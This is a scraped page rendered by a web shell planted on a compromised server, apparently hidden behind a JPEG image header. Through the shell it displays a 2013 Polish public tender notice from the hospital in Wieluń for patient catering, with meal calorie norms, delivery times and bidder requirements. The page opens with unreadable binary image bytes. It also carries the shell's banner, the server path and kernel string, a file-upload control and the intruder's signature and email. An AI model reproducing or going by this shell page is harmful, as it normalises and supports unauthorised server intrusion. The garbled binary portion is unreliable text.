JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130121/11535-N-2013.html

<p class="kh_header"><b>Wieluń: usługa codziennego  przygotowywania i dostarczania wyżywienia dla pacjentów Szpitala - catering.</b><br>
<b>Numer ogłoszenia: 11535 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 043 8438311 w. 355, faks 043 843 83 11 wew. 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa codziennego  przygotowywania i dostarczania wyżywienia dla pacjentów Szpitala - catering..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
1.1.usługa codziennego  przygotowywania i dostarczania wyżywienia dla   pacjentów Szpitala - catering.
1.2. Usługa przygotowania  posiłków w okresie zimowym ( 1 listopada  - 31 marca) zgodnie z rozporządzeniem Rady Ministrów z dnia 28.05.1996 r. oraz Zarządzeniem Dyrektora SPZOZ w Wieluniu w sprawie posiłków regeneracyjnych Nr  32 z dnia 27.10.2006 roku   w ilości  500  obiadów w tym okresie.
1.3. Dotyczy pkt 1.1. Wykonawca  gwarantuje, że   przygotowanie  posiłków  będzie  przeprowadzane  zgodnie  z  warunkami    określonymi  w  ustawie  z 25 sierpnia  2006 r. o bezpieczeństwie żywności  i  żywienia ( Dz. U z 2006 r. Nr 171,    poz. 1225 )
1.4. Każdy posiłek podstawowy (śniadanie, obiad i kolacja) z tzw. diety normalnej zgodnie z  załącznikiem  nr 6,   
musi  zawierać dostateczną ilość  produktów białkowych oraz dodatek warzyw lub owoców. Wartość    kaloryczna  posiłków ogółem powinna  się  mieścić w  granicach 2300 - 2400 kcal,  w tym białko  ogółem  80g, 
 w tym  białko   zwierzęce - 45g, tłuszcze - 80g, węglowodany - 325g.
 Wartość  kaloryczna  poszczególnych  posiłków  winna  mieścić  się  w  następujących   przedziałach :
        W przypadku  diet cukrzycowych dla chorych  przyjmujących  insulinę oraz  diety  dziecięcej  należy    
        przewidzieć  również  II  śniadanie, podwieczorek.
      - śniadanie -690 - 805 kcal, co  stanowi  30-35 % rozdziału całodziennego  zapotrzebowania    
        energetycznego  na  poszczególne  posiłki.
      - II śniadanie -  115 - 120 kcal, co  stanowi   5 % rozdziału całodziennego  zapotrzebowania energetycznego  
        na  poszczególne  posiłki
      - obiad -  805 - 920 kcal, co  stanowi  35 - 40 % rozdziału całodziennego  zapotrzebowania energetycznego  na  
        poszczególne  posiłki
      - podwieczorek - 115 - 120 kcal, co  stanowi   5 % rozdziału całodziennego  zapotrzebowania energetycznego  
        na  poszczególne  posiłki
      - kolacja - 575 - 690 kcal, co  stanowi  25 - 30 % rozdziału całodziennego  zapotrzebowania energetycznego  
        na poszczególne  posiłki.
1. 5. Realizacja średnich  norm  żywieniowych  według  grup  produktów  przedstawiać  się  musi  następująco : 
   - produkty zbożowe - 400g
   - mleko i produkty mleczne - 500g
   - jaja - 15g 
   - mięso, wędliny i ryby - 140g
   - masło i śmietana - 30g
   - inne tłuszcze - 35g
   - ziemniaki - 400g
   - warzywa i owoce z witamina C - 200g
   - warzywa z karotenem - 130g
   - inne  warzywa i owoce - 300g
   - strączkowe suche - 10g
  - cukier i słodycze - 55g
1. 6. Do posiłków : śniadanie  - należy przewidzieć kawę mleczną lub zupę mleczną, 
                               obiad - kompot lub kisiel płynny itp.
                               kolacja - należy planować herbatę wraz z cukrem.
Gramatura  mięsa  na  obiad podawana  z  sosem powinna  wynosić - 120g, bez  sosu - 100g. Dodatki  do  obiadu  w  postaci  surówek  roślinnych  lub  warzyw  gotowanych muszą  wynosić  co  najmniej  120g. 
Posiłki gorące, dostarczane muszą być w temp. zupy   75 0C, II danie 63 0C, surówki 4 0C.
1. 7. Przygotowywanie posiłków odbywać się musi z uwzględnieniem diet stosowanych w tutejszym szpitalu, oraz     
zgodnie ze zleceniami lekarzy, wg zamówień z poszczególnych oddziałów (wykaz stosowanych diet w załączeniu).
1. 8. Zamawianie posiłków na dany dzień realizowane będzie przez uprawnionych pracowników Szpitala.
1. 9.  Posiłki należy dostarczać wg ustalonego harmonogramu, w osobnych naczyniach (termosach) z oznaczeniem oddziału dla którego jest dostawa i ilością porcji. Termosy wraz z wkładami zabezpiecza Wykonawca.
1. 10.  Do obowiązków Wykonawcy należy dostarczenie indywidualnych naczyń na posiłki oraz  sztućcy.
1. 11.  Zapotrzebowania na posiłki dla pacjentów przyjmowanych do Szpitala w godzinach :
      a)16:00 dnia poprzedniego,  do godz.-7:00 dnia którego zamówienie dotyczy zgłaszane  będą Wykonawcy  
         telefonicznie ,do godziny 7:15 , a następnie potwierdzane pisemnie  (FAX), śniadanie i  II śniadanie   
       b)dla pacjentów przyjętych do Szpitala w godzinach 7:00 - 11:00 zgłaszane będą  Wykonawcy telefonicznie do 
          godziny 11:15 i również potwierdzane pisemnie (FAX), obiad , podwieczorek
      c)dla pacjentów przyjętych do Szpitala w godzinach 11:00 - 16:00 zgłaszane będą   Wykonawcy telefonicznie do  
         godziny 16:15 i również potwierdzane pisemnie(FAX),  Kolacja
1. 12.  Wykonawca zobowiązany będzie do sporządzania dekadowych jadłospisów w oparciu o aktualne przepisy   prawne obowiązujące przy ustalaniu racji pokarmowych w całodziennym  wyżywieniu określonych grup ludności    - Szpitale. 
1. 13.  Jadłospis winien być przedstawiony do akceptacji Zamawiającego z 4 dniowym  wyprzedzeniem. Należy   uwzględnić przygotowywanie posiłków tradycyjnych w okresach  świątecznych.
1. 14.  Do Wykonawcy należało będzie prowadzenie ewidencji wydawanych posiłków (dokument WZ) z podziałem na  diety oraz oddziały, potwierdzane każdorazowo imiennie przez uprawnione osoby, Zamawiający zastrzega   
sobie prawo do kontroli zgodności  rachunków z ewidencją tych posiłków.
1. 15.  Zakupy surowców Wykonawca realizował będzie w punktach, które zapewniają ich  wysoką  jakość, zupy 
 powinny być przygotowywane na bazie produktów naturalnych bez  użycia  półproduktów (np. zupy w proszku).
1. 16.  W przypadku zastosowania innych technologii produkcji posiłków niż wymagane lub zalecane stosownymi 
 przepisami Wykonawca musi uzyskać zgodę Powiatowej Stacji Sanitarno-Epidemiologicznej na ich stosowanie. Zamawiający zastrzega sobie prawo  bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących technologii produkcji i  jakości wykonywanych usług.
1. 17.  Obowiązkiem Wykonawcy  będzie  : 
- Wykonawca wykaże zatrudnienie dietetyka z minimum 3 letnim stażem pracy w zawodzie dietetyka, 
- Wykonawca przygotowując ofertę zobowiązany jest  zapewnić obsadę w miejscu dystrybucji posiłków  u 
  Zamawiającego,
- dostarczanie posiłków do pomieszczenia dystrybucji  w Szpitalu,
- mycie termosów  wraz z wkładami po wydaniu posiłków,
- utrzymywanie  czystości i porządku  oraz  odpowiedniego  stanu  sanitarno - technicznego  pomieszczenia  do   
  dystrybucji  posiłków
- przechowywanie próbek pokarmowych ze wszystkich  wykonanych i dostarczonych posiłków każdego dnia przez  
  okres 72 godzin z  oznaczeniem daty, godziny, zawartości próbki pokarmowej z podpisem osoby  odpowiedzialnej 
  za pobieranie tych próbek. 
- utylizacja odpadków żywnościowych
1. 18.  Maksymalna odległość na jaką Zamawiający dopuszcza dowożenie posiłków od Wykonawcy  do siedziby  Zamawiającego nie może przekroczyć 30 km.
1. 19.  Do oferty należy dołączyć przykładowy jadłospis dekadowy dla diety podstawowej tzw. normalnej  wraz z gramaturą oraz  ich  wartością  kaloryczną. W  jadłospisie  dekadowym nie  powinny  się  powtarzać  tzw. potrawy  podstawowe  w każdym z posiłków zatwierdzony - podpisany przez dietetyka Wykonawcy.

     Jadłospis  należy  przygotować  zgodnie  z  poniższą  tabelą : 

DZIEŃ I
ŚNIADANIE :	Waga :	Wartość kaloryczna :
1.
2.
3.
4.
5.
6.		
Razem wartość kaloryczna :	
II  ŚNIADANIE :		
1.
2.
3.		
                                                                   Razem wartość kaloryczna:	
OBIAD :	Waga :	Wartość kaloryczna :
1.
2.
3.
4.
5.		
Razem wartość kaloryczna :	
PODWIECZOREK:		
1.
2.
3.		
                                                                   Razem wartość kaloryczna :	
KOLACJA :	Waga :	Wartość kaloryczna :
1.
2.
3.
4.
5.		
Razem wartość kaloryczna :	
Razem  dzienna  wartość kaloryczna  posiłków :	
1. 20.  Ilość oddziałów do których będą  dostarczane posiłki  - 11

 - Ilość łóżek w oddziałach:
1.Oddział Internistyczny o p. Ogólnym 		- szt 40
2.Oddział Internistyczny o p. Kardiologicznym	- szt 40
3.Oddział Pulmonologii  			              - szt 39
4.Oddział Dziecięcy				- szt 22
5.Oddział Chirurgii Ogólnej			- szt 23
6.Oddział Chirurgii Dziecięcej			- szt 20 
7.Oddział Chirurgii Urazowo-Ortopedycznej		- szt 20
8.Oddział Położniczo-Ginekologiczny		- szt 42
9.Oddział Anestezjologii i Intensywnej Terapii	- szt   5
10.Szpitalny Oddział Ratunkowy			- szt   6
11.Oddział Rehabilitacji				- szt 20
Ilość łóżek  ogółem                                                    - szt 277
 
1.21.  Posiłki dla pacjentów muszą być dostarczone do Szpitala o ściśle określonych porach dnia, w związku z ustalonymi godzinami ich podawania :
- śniadanie dostarczyć do 7:30 , podanie 8:00 do 9:00
- II śniadanie dostarczyć do 7:30 , podanie  10:00
- obiad  dostarczyć do 11:30 podanie od 12:00 do 13:00
- podwieczorek dostarczyć do 11:30 podanie 15:00
- kolacja dostarczyć do 16:30 podanie od 17:00 do 18:00 

1.22	Średnia planowana ilość posiłków                               -  75.000 osobodni 
          Średnia planowana ilość: II śniadanie/podwieczorek -  11.000 posiłków
          Średnia planowana ilość posiłków regeneracyjnych  -        500 posiłków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający uzna, iż Wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności będacej 
przedmiotem niniejszego zamówienia po złożeniu wraz z ofertą :
-aktualnego odpisu z właściwego rejestru na prowadzenie działalności gospodarczej w zakresie objętym  zamówieniem wystawione nie wcześniej niż 6 miesięcy przed upływem    terminu  składania ofert 
-zaświadczenia o wpisie do rejestru zakładów podlegających urzędowej kontroli   organów Państwowej Inspekcji Sanitarnej, zgodnie z art. 62 ustawy z dnia 25 sierpnia 2006 roku o    bezpieczeństwie żywności i żywienia (Dz.U.06.171.1225 z zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia  na podstawie   
  WYKAZU  wykonanych, a w przypadku świadczeń   okresowych lub ciągłych również wykonywanych w okresie  3  
  ostatnich trzech lat przed upływem terminu składania ofert, (a jeżeli okres wykonywania  działalności jest krótszy - w  
  tym okresie) co najmniej jednej  usługi w zakresie żywienia pacjentów zakładów  opieki zdrowotnej o wartości brutto   
  nie mniejszej niż   500.000,00  ( SŁOWNIE: PIĘĆSET   TYSIĘCY ZŁOTYCH) - ZAŁĄCZNIK NR 7.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym  do wykonania zamówienia na podstawie załączonych  dokumentów : 
  - WYKAZ NIEZBĘDNYCH   DO  WYKONANIA  ZAMÓWIENIA  POJAZDÓW    (Załącznik Nr 8 do  SIWZ), 
 -  WYKAZ  OSÓB  KTÓRYMI DYSPONUJE  WYKONAWCA  (Załącznik Nr 9 do  SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednimi 
  osobami zdolnymi do wykonania zamówienia na podstawie załączonych  dokumentów : 
  - WYKAZ NIEZBĘDNYCH   DO  WYKONANIA  ZAMÓWIENIA  POJAZDÓW    (Załącznik Nr 8 do  SIWZ), 
 -  WYKAZ  OSÓB  KTÓRYMI DYSPONUJE  WYKONAWCA  (Załącznik Nr 9 do  SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek odpowiedniej sytuacji ekonomicznej i finansowej  na   
 podstawie dołączonej Polisy, a w przypadku jej  braku -  innego dokumentu potwierdzającego że wykonawca jest  
 ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności będącej przedmiotem zamowienia, na sumę gwarancyjną nie  niższą  niż 100.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dziale OiZP pokój 204 - nieodpłatnie SPZOZ w Wieluniu, ul. Szpitalna 16, 98-300 Wieluń..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu, ulica Szpitalna 16 , 98 - 300 Wieluń - SEKRETARIAT POKÓJ nr 216......</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com